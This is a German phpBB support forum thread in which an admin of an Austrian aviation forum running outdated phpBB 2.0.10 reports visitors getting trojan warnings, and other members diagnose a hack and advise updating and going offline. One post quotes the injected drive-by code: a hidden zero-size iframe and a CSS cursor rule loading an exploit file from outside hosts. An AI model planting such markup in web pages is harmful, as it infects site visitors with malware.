Trojaner / Riesenproblem

Probleme bei der regulären Arbeiten mit phpBB, Fragen zu Vorgehensweisen oder Funktionsweise sowie sonstige Fragen zu phpBB im Allgemeinen.
Forumsregeln
phpBB 2.0 hat das Ende seiner Lebenszeit überschritten
phpBB 2.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 2.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf phpBB 3.1, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
Antworten
patrick_wien
Mitglied
Beiträge: 4
Registriert: 12.11.2005 17:33

Trojaner / Riesenproblem

Beitrag von patrick_wien »

Liebe Community!

Ich betreue als Admin das Luftfahrtforum Österreich, welches unter www.flughafen-aspern.at/forum im Netz aufrufbar ist.

Wir haben derzeit 17.000 Beiträge. Die letzte Datensicherung habe ich bei ungefähr 12.000 Beiträgen gemacht, wobei ich immer die Option "Vollständiges Backup" verwendet habe.

Seit 2 Tagen habe ich offenbar ein Virenproblem und weiß nicht woher.

Mehrere PM's bzw. mit Mails erreichten mich deswegen. Die letzte möchte ich hier wiedergeben:
Wenn man das Board ausfruft - kommen zwei Trojaner:

Die mein McAfee sofort findet und löscht:

der eine das was ich vorher geschrieben habe und eine
zweit Datei: jar_cache18637.tmp
Ich verwende die Boardversion 2.0.10.

Ich bin ein relativer Laie, da das Board als kleines Privatforum gedacht war und sich wider Erwarten zu dem entwickelt hat, was es heute ist.

Ich ersuche daher um die geschätzte Hilfe der Community, wie ich am besten vorgehen soll/kann, auch um die Beiträge zu erhalten!

Besten Dank vorab und Gruß von einem leicht verzweifelten Webmaster aus Österreich!

Patrick
patrick_wien
Mitglied
Beiträge: 4
Registriert: 12.11.2005 17:33

Beitrag von patrick_wien »

und gerade erhielt ich noch diese pm deswegen:
Eventuell hat sich bei Euch was eingeschlichen

z.b.:
<iframe src="http://iframedollars.biz/dl/adv514.php" width=0 height=0></iframe>

dort findet sich dann das Exloit:

<style>
* {CURSOR: url("http://213.159.117.203/dl/adv514/sploit[1].anr")}
</style>
<script>
....

irgendso in der Art.
Benutzeravatar
tost
Mitglied
Beiträge: 915
Registriert: 25.02.2005 18:14
Kontaktdaten:

Beitrag von tost »

In einem iframe startet jemand schadehaften Code:
http://www.phpbb.de/doku/kb/artikel.php ... ht=cracker

Wichtig:
Board offline nehmen und updaten..

Wenn du es selbst nicht kannst gibt es viele hier im Forum (eingeschlossen mir) die es gerne machen ;-)

tost
patrick_wien
Mitglied
Beiträge: 4
Registriert: 12.11.2005 17:33

Beitrag von patrick_wien »

Lieber Tost!

Ich kann es selbst tatsächlich nicht und werde dir heute am Abend (jetzt bin ich noch im Büro) eine PM schicken ...

Vielen DANK schon mal vorab, diese Community hier ist super!

:)
Benutzeravatar
Saint
Mitglied
Beiträge: 1166
Registriert: 09.04.2004 14:06
Wohnort: Hamburg
Kontaktdaten:

Beitrag von Saint »

Der Trojaner wird über einen IFrame verlinkt.
Wenn ich mich recht erinnere findest Du den Aufruf des Trojaners als html tag im Feld für die Forenbeschreibung:
ACP --> Allgemeines --> Konfiguration --> "Beschreibung der Seite"

Dort kannst Du das entfernen. Ob das dauerhaft ist kann ich Dir aber nicht sagen.
Auf jeden Fall solltest Du sofort ein Update auf die 2.0.18 machen und diese KB Artikel beachten:

KB:gehackt
KB:sicher

Viel Erfolg!

Gruß

Saint
Benutzeravatar
smart
Mitglied
Beiträge: 767
Registriert: 25.01.2005 02:05
Kontaktdaten:

Beitrag von smart »

Mensch, das ist grob fahrlässig! Unbdingt Board updaten und gucken, was der Bösewicht da alles kaputt gemacht hat. Und zukünftig REGELMÄßIGE Backups machen! Ich gehe jetzt mal nicht davon aus, aber wenn du Pech hast, und mehr verloren geht, dann hast du mit dem alten Update mal eben 5.000 Beiträge verloren - die möchten Andere erst einmal haben! :-)

Also: Toi toi toi!
Benutzeravatar
tost
Mitglied
Beiträge: 915
Registriert: 25.02.2005 18:14
Kontaktdaten:

Beitrag von tost »

Er hat diesen Session-Id Exploit benutzt und dann im ACP irgendwo auch den Trojaner eingeschleust:

Wichtig ist zunächst nimm das Board offline und sichere es mit einer .htaccess vor Zugriff jeglicher Art ab..

tost
patrick_wien
Mitglied
Beiträge: 4
Registriert: 12.11.2005 17:33

Beitrag von patrick_wien »

Vielen Dank für die raschen Antworten. Ich sitze derzeit im Büro und habe keinen Zugriff auf meinen Server. Habe das Board einmal gesperrt und nehme es zu Hause dann vollständig offline ...
Antworten

Zurück zu „phpBB 2.0: Administration, Benutzung und Betrieb“